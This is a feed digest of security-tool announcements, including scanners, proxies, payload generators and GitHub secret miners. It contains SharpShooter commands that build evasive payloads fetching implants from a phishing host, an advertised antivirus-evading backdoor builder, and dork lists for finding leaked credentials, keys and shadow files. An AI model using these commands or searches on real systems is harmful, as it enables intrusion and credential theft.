Syhunt Community Hybrid Scanner v6.2

Syhunt Community is a hybrid static and dynamic web application security scanner. Syhunt is able to scan any kind of application source code for potential security vulnerabilities, pinpointing the exact lines of the code that need to be patched. Or you can simply enter a start URL and get detailed vulnerability information – Syhunt is also composed by a deep crawler able to fully map a website structure and an automated injector able to adapt, mutate, analyze and test the web application response to thousands of different web attacks.ChangeLog:Added source code scan for Node.js based web applications. Syhunt 6.2 is able to scan the source code of the Node.js web applications for security vulnerabilities with coverage for the Express and Koa frameworks. Version 6.2 adds code checks targeting Node.js web apps, covering: Cross-Site Scripting (XSS), Code Injection, HTTP Header Injection, Log Forging and more.Added the ability to scan the source code of Java EE and JSP web applications for security vulnerabilities. Syhunt tested and reviewed the 6.1 code scanner results with the help of over 1600 vulnerable Java web apps originated from the WAVSEP project, the NIST SAMATE project and Syhunt Lab’s own test cases, reaching highly accurate detection rates of security flaws. Added the ability to scan (though in beta form) the source code of Lua-based web applications compatible with Apache’s mod_lua, CGILua and Lua Pages for vulnerabilities such as XSS, Code Injection, HTTP Header Injection and more.Other improvements:Improved XSS detection in multiple languages (classic ASP, ASP.NET & PSP).Improved input filtering analysis.Improved speed (scan optimization).Improved support for short write tag in multiple languages.Automatic Python WSGI script detection.Download Syhunt Community hybrid scanner version 6.2

Link: http://feedproxy.google.com/~r/PentestTools/~3/naMgg9bwzAY/syhunt-community-hybrid-scanner-v62.html

ASWCrypter – An Bash&Python Script For Generating Payloads that Bypasses All Antivirus

An Bash&Python Script For Generating Payloads that Bypasses All Antivirus so far [FUD].PLEASE DON’T UPLOAD BACKDOOT TO WWW.VIRUSTOTAL.COM ImportantThis Version Just for test , In future I will update ASWCrypter to generate a payloads for linux ,Mac and Windows . ;)Legal Disclamer:The author does not hold any responsibility for the bad use of this tool, remember this is only for educational purpose.Requirements1- Metasploit Framework 2- PythonGetting Startedgit clone https://github.com/AbedAlqaderSwedan1/ASWCrypter.gitcd ASWCrypterchmod +x setup.sh or chmod 777 setup.shScreenshotDownload ASWCrypter

Link: http://feedproxy.google.com/~r/PentestTools/~3/LBt2kOgRz1c/aswcrypter-bash-script-for-generating.html

SharpShooter – Payload Generation Framework

SharpShooter is a payload creation framework for the retrieval and execution of arbitrary CSharp source code. SharpShooter is capable of creating payloads in a variety of formats, including HTA, JS, VBS and WSF. It leverages James Forshaw’s DotNetToJavaScript tool to invoke methods from the SharpShooter DotNet serialised object. Payloads can be retrieved using Web or DNS delivery or both; SharpShooter is compatible with the MDSec ActiveBreach PowerDNS project. Alternatively, stageless payloads with embedded shellcode execution can also be generated for the same scripting formats.SharpShooter payloads are RC4 encrypted with a random key to provide some modest anti-virus evasion, and the project includes the capability to integrate sandbox detection and environment keying to assist in evading detection.SharpShooter includes a predefined CSharp template for executing shellcode with staged and stageless payloads, but any CSharp code can be compiled and invoked in memory using reflection, courtesy of CSharp’s CodeDom provider.Finally, SharpShooter provides the ability to bundle the payload inside an HTML file using the Demiguise HTML smuggling technique.SharpShooter targets v2, v3 and v4 of the .NET framework which will be found on most end-user Windows workstations.Version 1.0 of SharpShooter introduced several new concepts, including COM staging, execution of Squiblydoo and Squiblytwo, as well as XSL execution. To acomplish this new functionality, several new flags were added; –com, –awl and –awlurl.Further information can be found on the MDSec blog post.Usage – Command Line Mode:SharpShooter is highly configurable, supporting a number of different payload types, sandbox evasions, delivery methods and output types.Running SharpShooter with the –help argument will produce the following output:usage: SharpShooter.py [-h] [–stageless] [–dotnetver ] [–com <com>] [–awl <awl>] [–awlurl <awlurl>] [–payload <format>] [–sandbox <types>] [–amsi <amsi>] [–delivery <type>] [–rawscfile <path>] [–shellcode] [–scfile <path>] [–refs <refs>] [–namespace <ns>] [–entrypoint <ep>] [–web <web>] [–dns <dns>] [–output <output>] [–smuggle] [–template <tpl>]optional arguments: -h, –help show this help message and exit –stageless Create a stageless payload –dotnetver <ver> Target .NET Version: 2 or 4 –com <com> COM Staging Technique: outlook, shellbrowserwin, wmi, wscript, xslremote –awl <awl> Application Whitelist Bypass Technique: wmic, regsvr32 –awlurl <awlurl> URL to retrieve XSL/SCT payload –payload <format> Payload type: hta, js, jse, vba, vbe, vbs, wsf –sandbox <types> Anti-sandbox techniques: [1] Key to Domain (e.g. 1=CONTOSO) [2] Ensure Domain Joined [3] Check for Sandbox Artifacts [4] Check for Bad MACs [5] Check for Debugging –amsi <amsi> Use amsi bypass technique: amsienable –delivery <type> Delivery method: web, dns, both –rawscfile <path> Path to raw shellcode file for stageless payloads –shellcode Use built in shellcode execution –scfile <path> Path to shellcode file as CSharp byte array –refs <refs> References required to compile custom CSharp, e.g. mscorlib.dll,System.Windows.Forms.dll –namespace <ns> Namespace for custom CSharp, e.g. Foo.bar –entrypoint <ep> Method to execute, e.g. Main –web <web> URI for web delivery –dns <dns> Domain for DNS delivery –output <output> Name of output file (e.g. maldoc) –smuggle Smuggle file inside HTML –template <tpl> Name of template file (e.g. mcafee)Examples of some use cases are provided below:Stageless JavaScriptSharpShooter.py –stageless –dotnetver 4 –payload js –output foo –rawscfile ./raw.txt –sandbox 1=contoso,2,3Create a stageless JavaScript payload targeting version 4 of the .NET framework. This example will create a payload named foo.js in the output directory. The shellcode is read from the ./raw.txt file. The payload attempts to enforce some sandbox evasion by keying execution to the CONTOSO domain, and checking for known sandbox/VM artifacts.Stageless HTASharpShooter.py –stageless –dotnetver 2 –payload hta –output foo –rawscfile ./raw.txt –sandbox 4 –smuggle –template mcafeeCreate a stageless HTA payload targeting version 2/3 of the .NET framework. This example will create a payload named foo.hta in the output directory. The shellcode is read from the ./raw.txt file. The payload attempts to enforce some sandbox evasion by checking for known virtual MAC addresses. A HTML smuggling payload will also be generated named foo.html in the output directory. This payload will use the example McAfee virus scan template.Staged VBSSharpShooter.py –payload vbs –delivery both –output foo –web http://www.foo.bar/shellcode.payload –dns bar.foo –shellcode –scfile ./csharpsc.txt –sandbox 1=contoso –smuggle –template mcafee –dotnetver 4This example creates a staged VBS payload that performs both Web and DNS delivery. The payload will attempt to retrieve a GZipped CSharp file that executes the shellcode supplied as a CSharp byte array in the csharpsc.txt file. The CSharp file used is the built-in SharpShooter shellcode execution template. The payload is created in the output directory named foo.payload and should be hosted on http://www.foo.bar/shellcode.payload. The same file should also be hosted on the bar.foo domain using PowerDNS to serve it. The VBS file will attempt to key execution to the CONTOSO domain and will be embedded in a HTML file using the HTML smuggling technique with the McAfee virus scanned template. The resultant payload is stored in the output directory named foo.html.Custom CSharp inside VBSSharpShooter.py –dotnetver 2 –payload js –sandbox 2,3,4,5 –delivery web –refs mscorlib.dll,System.Windows.Forms.dll –namespace MDSec.SharpShooter –entrypoint Main –web http://www.phish.com/implant.payload –output malicious –smuggle –template mcafeeThis example demonstrates how to create a staged JS payload that performs web delivery, retrieving a payload from http://www.phish.com/implant.payload. The generated payload will attempt sandbox evasion, and attempt to compile the retrieved payload which requires mscorlib.dll and System.Windows.Forms.dll as DLL references. The Main method in the MDSec.SharpShooter namespace will be executed on successful compilation.Creation of a Squiblytwo VBSSharpShooter.py –stageless –dotnetver 2 –payload vbs –output foo –rawscfile ./x86payload.bin –smuggle –template mcafee –com outlook –awlurl http://192.168.2.8:8080/foo.xslThis example creates a VBS smuggled COM stager that uses the Outlook.CreateObject() COM method as a primitive to execute wmic.exe to execute a hosted stylesheet. The –awl parameter is not used by defaults to wmic.Creation of a XSL HTASharpShooter.py –stageless –dotnetver 2 –payload hta –output foo –rawscfile ./x86payload.bin –smuggle –template mcafee –com xslremote –awlurl http://192.168.2.8:8080/foo.xslThis example creates a HTA smuggled file that uses the the XMLDOM COM interface to retrieve and execute a hosted stylesheet.Author and CreditsAuthor: Dominic Chell, MDSec ActiveBreach @domchell and @mdseclabsCredits:@tiraniddo: James Forshaw for [email protected]: for [email protected]: Rich Warren for [email protected] and @ChrisTruncer: Brandon Arvanaghi and Chris Truncer for [email protected]: Documentation for Squiblydoo and Squiblytwo techniquesDownload SharpShooter

Link: http://feedproxy.google.com/~r/PentestTools/~3/KJriJP1hJA4/sharpshooter-payload-generation.html

Mallet – A Framework For Creating Proxies

Mallet is a tool for creating proxies for arbitrary protocols, along similar lines to the familiar intercepting web proxies, just more generic.It is built upon the Netty framework, and relies heavily on the Netty pipeline concept, which allows the graphical assembly of graphs of handlers. In the Netty world, handler instances provide frame delimitation (i.e. where does a message start and end), protocol decoding and encoding (converting a stream of bytes into Java objects, and back again, or converting a stream of bytes into a different stream of bytes – think compression and decompression), and higher level logic (actually doing something with those objects).By following the careful separation of Codecs from Handlers that actually manipulate the messages, Mallet can benefit from the large library of existing Codecs, and avoid reimplementation of many protocols. The final piece of the puzzle is provided by a Handler that copies messages received on one pipeline to another pipeline, proxying those messages on to their final destination.Of course, while the messages are within Mallet, they can easily be tampered with, either with custom Handlers written in Java or a JSR-223 compliant scripting language, or manually, using one of the provided editors.You can get an idea of the available codecs by looking at the Netty source at GitHub, under the codec* directories.Building MalletMallet makes use of Maven, so compiling the code is a matter ofmvn packageTo run it:cd target/java -jar mallet-1.0-SNAPSHOT-spring-boot.jarThere are a few sample graphs provided in the examples/ directory. The JSON graphs expect a JSON client to connect to Mallet on localhost:9998/tcp, with the real server at localhost:9999/tcp. Only the last JSON graph (json5.mxe) makes any assumptions about the structure of the JSON messages being passed, so they should be applicable to any app that sends JSON messages.The demo.mxe shows a complex graph, with two pipelines, both TCP and UDP. The TCP pipeline is built to support HTTP and HTTPS on ports 80 and 443 respectively, as well as WebSockets, while relaying any other traffic directly to its destination. The UDP pipeline is built to process DNS requests on localhost:1053/udp, replace queries for google.com with queries for www.sensepost.com, and forward the requests on to Google DNS servers.Download Mallet

Link: http://feedproxy.google.com/~r/PentestTools/~3/uEIqUbaTQy4/mallet-framework-for-creating-proxies.html

CMSeeK v1.0.9 – CMS Detection And Exploitation Suite (Scan WordPress, Joomla, Drupal And 100 Other CMSs)

What is a CMS?A content management system (CMS) manages the creation and modification of digital content. It typically supports multiple users in a collaborative environment. Some noteable examples are: WordPress, Joomla, Drupal etc.Release History- Version 1.0.9 [21-08-2018]- Version 1.0.8 [14-08-2018]- Version 1.0.7 [07-08-2018]- Version 1.0.6 [23-07-2018]- Version 1.0.5 [19-07-2018]- Version 1.0.4 [17-07-2018]- Version 1.0.3 [06-07-2018]- Version 1.0.2 [06-07-2018]- Version 1.0.1 [19-06-2018]- Version 1.0.0 [15-06-2018]Changelog FileFunctions Of CMSeek:Basic CMS Detection of over 30 CMSDrupal version detectionAdvanced WordPress ScansDetects VersionUser EnumerationPlugins EnumerationTheme EnumerationDetects Users (3 Detection Methods)Looks for Version Vulnerabilities and much more!Advanced Joomla ScansVersion detectionBackup files finderAdmin page finderCore vulnerability detectionDirectory listing checkConfig leak detectionVarious other checksModular bruteforce systemUse pre made bruteforce modules or create your own and integrate with itRequirements and Compatibility:CMSeeK is built using python3, you will need python3 to run this tool and is compitable with unix based systems as of now. Windows support will be added later. CMSeeK relies on git for auto-update so make sure git is installed.Installation and Usage:It is fairly easy to use CMSeeK, just make sure you have python3 and git (just for cloning the repo) installed and use the following commands:git clone https://github.com/Tuhinshubhra/CMSeeKcd CMSeeKFor guided scanning:python3 cmseek.pyElse:python3 cmseek.py -u […]Help menu from the program:USAGE: python3 cmseek.py (for a guided scanning) OR python3 cmseek.py [OPTIONS] <Target Specification>SPECIFING TARGET: -u URL, –url URL Target Url -l LIST, -list LIST path of the file containing list of sites for multi-site scan (comma separated)USER AGENT: -r, –random-agent Use a random user agent –user-agent USER_AGENT Specify custom user agentOUTPUT: -v, –verbose Increase output verbosityVERSION & UPDATING: –update Update CMSeeK (Requires git) –version Show CMSeeK version and exitHELP & MISCELLANEOUS: -h, –help Show this help message and exit –clear-result Delete all the scan resultEXAMPLE USAGE: python3 cmseek.py -u example.com # Scan example.com python3 cmseek.py -l /home/user/target.txt # Scan the sites specified in target.txt (comma separated) python3 cmseek.py -u example.com –user-agent Mozilla 5.0 # Scan example.com using custom user-Agent Mozilla is 5.0 used here python3 cmseek.py -u example.com –random-agent # Scan example.com using a random user-Agent python3 cmseek.py -v -u example.com # enabling verbose output while scanning example.comChecking For Update:You can check for update either from the main menu or use python3 cmseek.py –update to check for update and apply auto update.P.S: Please make sure you have git installed, CMSeeK uses git to apply auto update.Detection Methods:CMSeek detects CMS via the following:HTTP HeadersGenerator meta tagPage source coderobots.txtSupported CMSs:CMSeeK currently can detect 40 CMSs, you can find the list on cmss.py file which is present in the cmseekdb directory. All the cmss are stored in the following way: cmsID = { ‘name’:’Name Of CMS’, ‘url’:’Official URL of the CMS’, ‘vd’:’Version Detection (0 for no, 1 for yes)’, ‘deeps’:’Deep Scan (0 for no 1 for yes)’ }Scan Result:All of your scan results are stored in a json file named cms.json, you can find the logs inside the Result\<Target Site> directory, and as of the bruteforce results they’re stored in a txt file under the site’s result directory as well.Here is an example of the json report log:Bruteforce Modules:CMSeek has a modular bruteforce system meaning you can add your custom made bruteforce modules to work with cmseek. A proper documentation for creating modules will be created shortly but in case you already figured out how to (pretty easy once you analyze the pre-made modules) all you need to do is this:Add a comment exactly like this # <Name Of The CMS> Bruteforce module. This will help CMSeeK to know the name of the CMS using regex Add another comment ### cmseekbruteforcemodule, this will help CMSeeK to know it is a module Copy and paste the module in the brutecms directory under CMSeeK’s directory Open CMSeeK and Rebuild Cache using U as the input in the first menu. If everything is done right you’ll see something like this (refer to screenshot below) and your module will be listed in bruteforce menu the next time you open CMSeeK.Need More Reasons To Use CMSeeK?If not anything you can always enjoy exiting CMSeeK (please don’t), it will bid you goodbye in a random goodbye message in various languages.Also you can try reading comments in the code those are pretty random and weird!!!Screenshots:Download CMSeeK

Link: http://feedproxy.google.com/~r/PentestTools/~3/NGGMG4yYz8A/cmseek-v109-cms-detection-and.html

Vim.Wasm – Vim Editor Ported To WebAssembly

This project is an experimental fork of Vim editor by @rhysd to compile it into WebAssembly using emscripten and binaryen.Try it with your browserNOTICESPlease access from a desktop browser (Chrome/Firefox/Safari/Edge). Safari seems the best on macOS.Please avoid slow networks. Your browser will fetch total of around 1MB files.vim.wasm takes key inputs from DOM keydown event. Please disable your browser extensions which affect key inputs (incognito mode would be the best).This project is very early phase of experiment. Currently only tiny features are supported. More features will be implemented (please see TODO section). And you may notice soon on trying it… it’s buggy :)If inputting something does not change anything, please try to click somewhere in the page. Vim may have lost the focus.You can try vimtutor by :e tutor.The goal of this project is running Vim editor on browser by compiling Vim C sources into WebAssembly.How It WorksBuild ProcessWebAssembly frontend for Vim is implemented as a new GUI frontend. C sources are compiled to each LLVM bitcode files and then they are linked to one bitcode file vim.bc by emcc. emcc finally compiles the vim.bc into vim.wasm binary using binaryen and generates HTML/JavaScript runtime.The difference I faced at first was the lack of terminal library such as ncurses. I modified configure script to ignore the terminal library check. It’s OK since GUI frontend for Wasm is always used instead of CUI frontend. I needed many workarounds to pass configure checks.emscripten provides Unix-like environment. So os_unix.c can support Wasm. However, some features are not supported by emscripten. I added many #ifdef FEAT_GUI_WASM guards to disable features which cannot be supported by Wasm (i.e. fork (2) support, PTY support, signal handlers are stubbed, …etc).I created gui_wasm.c heavily referencing gui_mac.c and gui_w32.c. Event loop (gui_mch_update() and gui_mch_wait_for_chars()) is simply implemented with sleep(). And almost all UI rendering events arer passed to JavaScript layer by calling JavaScript functions from C thanks to emscripten.C sources are compiled (with many optimizations) into LLVM bitcode with Clang which is integrated to emscripten. Then all bitcode files (.o) are linked to one bitcode file vim.bc with llvm-link linker (also integrated to emscripten).Finally I created JavaScript runtime to draw the rendering events sent from C. It is created as wasm/runtime.ts using emscripten API. It draws Vim screen to

element with rendering events such as ‘draw text’, ‘scroll screen’, ‘set foreground color’, ‘clear rect’, …etc.emcc (emscripten’s C compiler) compiles the vim.bc into vim.wasm, vim.js and vim.html with preloaded Vim runtime files (i.e. colorscheme) using binaryen. Runtime files are put on a virtual file system provided by emscripten on a browser.Now hosting vim.html with a web server and accessing to it with browser opens Vim. It works.User InteractionUser interaction is very simple. You input something with keyboard. Browser takes it as KeyboardEvent on keydown event and JavaScript runtime sends the input to Wasm thanks to emscripten’s JS to C API. Sent input is added to a buffer in C layer. It affects the editor’s state.An editor core implemented in C calculates rendering events and sends it to JavaScript layer thanks to emscripten’s C to JS API. JavaScript runtime receives rendering events and stores them into a queue. On animation frames, it draws them to <canvas/> element in the web page.Finally you can see the rendered results in the page.Download Vim.Wasm

Link: http://feedproxy.google.com/~r/PentestTools/~3/1vJYKge35tI/vimwasm-vim-editor-ported-to-webassembly.html

GitMiner v2.0 – Tool For Advanced Mining For Content On Github

Advanced search tool and automation in Github. This tool aims to facilitate research by code or code snippets on github through the site’s search page.MOTIVATIONDemonstrates the fragility of trust in public repositories to store codes with sensitive information.REQUIREMENTSlxmlrequestsargparsejsonreINSTALLgit clone http://github.com/UnkL4b/GitMinersudo apt-get install python-requests python-lxml ORpip install -r requirements.txtDockergit clone http://github.com/UnkL4b/GitMinercd GitMinerdocker build -t gitminer .docker run -it gitminer -hHELP UnkL4b __ Automatic search for Github((OO)) ▄████ ██▓▄▄▄█████▓ ███▄ ▄███▓ ██▓ ███▄ █ ▓█████ ██▀███ \__/ ██▒ ▀█▒▓██▒▓ ██▒ ▓▒▓██▒▀█▀ ██▒▓██▒ ██ ▀█ █ ▓█ ▀ ▓██ ▒ ██▒ OO |^| ▒██░▄▄▄░▒██▒▒ ▓██░ ▒░▓██ ▓██░▒██▒▓██ ▀█ ██▒▒███ ▓██ ░▄█ ▒ oOo | | ░▓█ ██▓░██░░ ▓██▓ ░ ▒██ ▒██ ░██░▓██▒ ▐▌██▒▒▓█ ▄ ▒██▀▀█▄ OoO | | ░▒▓███▀▒░██░ ▒██▒ ░ ▒██▒ ░██▒░██░▒██░ ▓██░░▒████▒░██▓ ▒██▒ /oOo | |___░▒___▒_░▓____▒_░░___░_▒░___░__░░▓__░_▒░___▒_▒_░░_▒░_░░_▒▓_░▒▓░_/ / \______░___░__▒_░____░____░__░______░_▒_░░_░░___░_▒░_░_░__░__░▒_░_▒░__/ v2.0 ░ ░ ░ ▒ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ -> github.com/UnkL4b -> unkl4b.github.io +———————[WARNING]———————+ | DEVELOPERS ASSUME NO LIABILITY AND ARE NOT | | RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY | | THIS PROGRAM | +—————————————————+ [-h] [-q ‘filename:shadow path:etc’] [-m wordpress] [-o result.txt] [-r ‘/^\s*.*?;?\s*$/gm’] [-c _octo=GH1.1.2098292984896.153133829439; _ga=GA1.2.36424941.153192375318; user_session=oZIxL2_ajeDplJSndfl37ddaLAEsR2l7myXiiI53STrfhqnaN; __Host-user_session_same_site=oXZxv9_ajeDplV0gAEsmyXiiI53STrfhDN; logged_in=yes; dotcom_user=unkl4b; tz=America%2FSao_Paulo; has_recent_activity=1; _gh_sess=MmxxOXBKQ1RId3NOVGpGcG54aEVnT1o0dGhxdGdzWVpySnFRd1dVYUk5TFZpZXFuTWxOdW1FK1IyM0pONjlzQWtZM2xtaFR3ZDdxlGMCsrWnBIdnhUN0tjVUtMYU1GeG5Pbm5DMThuWUFETnZjcllGOUNkRGUwNUtKOVJTaGR5eUJYamhWRE5XRnMWZZN3Y3dlpFNDZXL1NWUEN4c093RFhQd3RJQ1NBdmhrVDE3VVNiUFF3dHBycC9FeDZ3cFVXV0ZBdXZieUY5WDRlOE9ZSG5sNmRHUmllcmk0Up1MTcyTXZrN1RHYmJSdz09–434afdd652b37745f995ab55fc83]optional arguments: -h, –help show this help message and exit -q ‘filename:shadow path:etc’, –query ‘filename:shadow path:etc’ Specify search term -m wordpress, –module wordpress Specify the search module -o result.txt, –output result.txt Specify the output file where it will be saved -r ‘/^\s*(.*?);?\s*$/gm’, –regex ‘/^\s*(.*?);?\s*$/gm’ Set regex to search in file -c _octo=GH1.1.2098292984896.153133829439; _ga=GA1.2.36424941.153192375318; user_session=oZIxL2_ajeDplJSndfl37ddaLAEsR2l7myXiiI53STrfhqnaN; __Host-user_session_same_site=oXZxv9_ajeDplV0gAEsmyXiiI53STrfhDN; logged_in=yes; dotcom_user=unkl4b; tz=America%2FSao_Paulo; has_recent_activity=1; _gh_sess=MmxxOXBKQ1RId3NOVGpGcG54aEVnT1o0dGhxdGdzWVpySnFRd1dVYUk5TFZpZXFuTWxOdW1FK1IyM0pONjlzQWtZM2xtaFR3ZDdxlGMCsrWnBIdnhUN0tjVUtMYU1GeG5Pbm5DMThuWUFETnZjcllGOUNkRGUwNUtKOVJTaGR5eUJYamhWRE5XRnMWZZN3Y3dlpFNDZXL1NWUEN4c093RFhQd3RJQ1NBdmhrVDE3VVNiUFF3dHBycC9FeDZ3cFVXV0ZBdXZieUY5WDRlOE9ZSG5sNmRHUmllcmk0Up1MTcyTXZrN1RHYmJSdz09–434afdd652b37745f995ab55fc83, –cookie _octo=GH1.1.2098292984896.153133829439; _ga=GA1.2.36424941.153192375318; user_session=oZIxL2_ajeDplJSndfl37ddaLAEsR2l7myXiiI53STrfhqnaN; __Host-user_session_same_site=oXZxv9_ajeDplV0gAEsmyXiiI53STrfhDN; logged_in=yes; dotcom_user=unkl4b; tz=America%2FSao_Paulo; has_recent_activity=1; _gh_sess=MmxxOXBKQ1RId3NOVGpGcG54aEVnT1o0dGhxdGdzWVpySnFRd1dVYUk5TFZpZXFuTWxOdW1FK1IyM0pONjlzQWtZM2xtaFR3ZDdxlGMCsrWnBIdnhUN0tjVUtMYU1GeG5Pbm5DMThuWUFETnZjcllGOUNkRGUwNUtKOVJTaGR5eUJYamhWRE5XRnMWZZN3Y3dlpFNDZXL1NWUEN4c093RFhQd3RJQ1NBdmhrVDE3VVNiUFF3dHBycC9FeDZ3cFVXV0ZBdXZieUY5WDRlOE9ZSG5sNmRHUmllcmk0Up1MTcyTXZrN1RHYmJSdz09–434afdd652b37745f995ab55fc83 Specify the cookie for your githubEXAMPLESearching for wordpress configuration files with passwords:$:> python gitminer-v2.0.py -q ‘filename:wp-config extension:php FTP_HOST in:file ‘ -m wordpress -c pAAAhPOma9jEsXyLWZ-16RTTsGI8wDawbNs4 -o result.txtLooking for brasilian government files containing passwords:$:> python gitminer-v2.0.py –query ‘extension:php “root" in:file AND "gov.br" in:file’ -m senhas -c pAAAhPOma9jEsXyLWZ-16RTTsGI8wDawbNs4Looking for shadow files on the etc paste:$:> python gitminer-v2.0.py –query ‘filename:shadow path:etc’ -m root -c pAAAhPOma9jEsXyLWZ-16RTTsGI8wDawbNs4Searching for joomla configuration files with passwords:$:> python gitminer-v2.0.py –query ‘filename:configuration extension:php "public password" in:file’ -m joomla -c pAAAhPOma9jEsXyLWZ-16RTTsGI8wDawbNs4Hacking SSH ServersDork to searchby @techgaun (https://github.com/techgaun/github-dorks) Dork Description filename:.npmrc _auth npm registry authentication data filename:.dockercfg auth docker registry authentication data extension:pem private private keys extension:ppk private puttygen private keys filename:id_rsa or filename:id_dsa private ssh keys extension:sql mysql dump mysql dump extension:sql mysql dump password mysql dump look for password; you can try varieties filename:credentials aws_access_key_id might return false negatives with dummy values filename:.s3cfg might return false negatives with dummy values filename:wp-config.php wordpress config files filename:.htpasswd htpasswd files filename:.env DB_USERNAME NOT homestead laravel .env (CI, various ruby based frameworks too) filename:.env MAIL_HOST=smtp.gmail.com gmail smtp configuration (try different smtp services too) filename:.git-credentials git credentials store, add NOT username for more valid results PT_TOKEN language:bash pivotaltracker tokens filename:.bashrc password search for passwords, etc. in .bashrc (try with .bash_profile too) filename:.bashrc mailchimp variation of above (try more variations) filename:.bash_profile aws aws access and secret keys rds.amazonaws.com password Amazon RDS possible credentials extension:json api.forecast.io try variations, find api keys/secrets extension:json mongolab.com mongolab credentials in json configs extension:yaml mongolab.com mongolab credentials in yaml configs (try with yml) jsforce extension:js conn.login possible salesforce credentials in nodejs projects SF_USERNAME salesforce possible salesforce credentials filename:.tugboat NOT _tugboat Digital Ocean tugboat config HEROKU_API_KEY language:shell Heroku api keys HEROKU_API_KEY language:json Heroku api keys in json files filename:.netrc password netrc that possibly holds sensitive credentials filename:_netrc password netrc that possibly holds sensitive credentials filename:hub oauth_token hub config that stores github tokens filename:robomongo.json mongodb credentials file used by robomongo filename:filezilla.xml Pass filezilla config file with possible user/pass to ftp filename:recentservers.xml Pass filezilla config file with possible user/pass to ftp filename:config.json auths docker registry authentication data filename:idea14.key IntelliJ Idea 14 key, try variations for other versions filename:config irc_pass possible IRC config filename:connections.xml possible db connections configuration, try variations to be specific filename:express.conf path:.openshift openshift config, only email and server thou filename:.pgpass PostgreSQL file which can contain passwords filename:proftpdpasswd Usernames and passwords of proftpd created by cpanel filename:ventrilo_srv.ini Ventrilo configuration [WFClient] Password= extension:ica WinFrame-Client infos needed by users to connect toCitrix Application Servers filename:server.cfg rcon password Counter Strike RCON Passwords JEKYLL_GITHUB_TOKEN Github tokens used for jekyll filename:.bash_history Bash history file filename:.cshrc RC file for csh shell filename:.history history file (often used by many tools) filename:.sh_history korn shell history filename:sshd_config OpenSSH server config filename:dhcpd.conf DHCP service config filename:prod.exs NOT prod.secret.exs Phoenix prod configuration file filename:prod.secret.exs Phoenix prod secret filename:configuration.php JConfig password Joomla configuration file filename:config.php dbpasswd PHP application database password (e.g., phpBB forum software) path:sites databases password Drupal website database credentials shodan_api_key language:python Shodan API keys (try other languages too) filename:shadow path:etc Contains encrypted passwords and account information of new unix systems filename:passwd path:etc Contains user account information including encrypted passwords of traditional unix systems extension:avastlic Contains license keys for Avast! Antivirus extension:dbeaver-data-sources.xml DBeaver config containing MySQL Credentials filename:.esmtprc password esmtp configuration extension:json googleusercontent client_secret OAuth credentials for accessing Google APIs HOMEBREW_GITHUB_API_TOKEN language:shell Github token usually set by homebrew users xoxp OR xoxb Slack bot and private tokens .mlab.com password MLAB Hosted MongoDB Credentials filename:logins.json Firefox saved password collection (key3.db usually in same repo) filename:CCCam.cfg CCCam Server config file msg nickserv identify filename:config Possible IRC login passwords filename:settings.py SECRET_KEY Django secret keys (usually allows for session hijacking, RCE, etc) Download GitMiner

Link: http://feedproxy.google.com/~r/PentestTools/~3/VtATqnX-O4U/gitminer-v20-tool-for-advanced-mining.html

WAF Buster – Disrupt WAF By Abusing SSL/TLS Ciphers

Disrupt WAF by abusing SSL/TLS CiphersAbout WAF_busterThis tool was created to Analyze the ciphers that are supported by the Web application firewall being used at the web server end. (Reference: https://0x09al.github.io/waf/bypass/ssl/2018/07/02/web-application-firewall-bypass.html) It works by first triggering SslScan to look for all the supported ciphers during SSL/TLS negotiation with the web server.After getting the text file of all the supported ciphers, then we use Curl to query web server with each and every Cipher to check which of the ciphers are unsupported by WAF and supported by Web server , if any such Cipher is found then a message is displayed that “Firewall is bypassed".ScreenshotsInstallationgit clone https://github.com/viperbluff/WAF_buster.git Python2This tool has been created using Python2 and below modules have been used throughout:-1.requests2.os3.sys4.subprocessUsage Open terminal python2 WAF_buster.py –inputDownload WAF_buster

Link: http://feedproxy.google.com/~r/PentestTools/~3/0fQO7UVapz0/waf-buster-disrupt-waf-by-abusing.html

Aws_Public_Ips – Fetch All Public IP Addresses Tied To Your AWS Account

aws_public_ips is a tool to fetch all public IP addresses (both IPv4/IPv6) associated with an AWS account.It can be used as a library and as a CLI, and supports the following AWS services (all with both Classic & VPC flavors):APIGatewayCloudFrontEC2 (and as a result: ECS, EKS, Beanstalk, Fargate, Batch, & NAT Instances)ElasticSearchELB (Classic ELB)ELBv2 (ALB/NLB)LightsailRDSRedshiftIf a service isn’t listed (S3, ElastiCache, etc) it’s most likely because it doesn’t have anything to support (i.e. it might not be deployable publicly, it might have all ip addresses resolve to global AWS infrastructure, etc).Quick startInstall the gem and run it:$ gem install aws_public_ips# Uses default ~/.aws/credentials$ aws_public_ips52.84.11.1352.84.11.832600:9000:2039:ba00:1a:cd27:1440:93a12600:9000:2039:6e00:1a:cd27:1440:93a1# With a custom profile$ AWS_PROFILE=production aws_public_ips52.84.11.159CLI reference$ aws_public_ips –helpUsage: aws_public_ips [options] -s, –services ,<s2>,<s3> List of AWS services to check. Available services: apigateway,cloudfront,ec2,elasticsearch,elb,elbv2,lightsail,rds,redshift. Defaults to all. -f, –format <format> Set output format. Available formats: json,prettyjson,text. Defaults to text. -v, –[no-]verbose Enable debug/trace output –version Print version -h, –help Show this help messageConfigurationFor authentication aws_public_ips uses the default aws-sdk-ruby configuration, meaning that the following are checked in order:Environment variables:AWS_ACCESS_KEY_IDAWS_SECRET_ACCESS_KEYAWS_REGIONAWS_PROFILEShared credentials files:~/.aws/credentials~/.aws/configInstance profile via metadata endpoint (if running on EC2, ECS, EKS, or Fargate)For more information see the AWS SDK documentation on configuration.IAM permissionsTo find the public IPs from all AWS services, the minimal policy needed by your IAM user is:{ “Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Action": [ "apigateway:GET", "cloudfront:ListDistributions", "ec2:DescribeInstances", "elasticloadbalancing:DescribeLoadBalancers", "lightsail:GetInstances", "lightsail:GetLoadBalancers", "rds:DescribeDBInstances", "redshift:DescribeClusters" ], "Resource": "*" } ]}ContactFeel free to tweet or direct message: @arkadiytDownload Aws_Public_Ips

Link: http://feedproxy.google.com/~r/PentestTools/~3/aLYdLNP_wx4/awspublicips-fetch-all-public-ip.html

Resource-Counter – This Command Line Tool Counts The Number Of Resources In Different Categories Across Amazon Regions

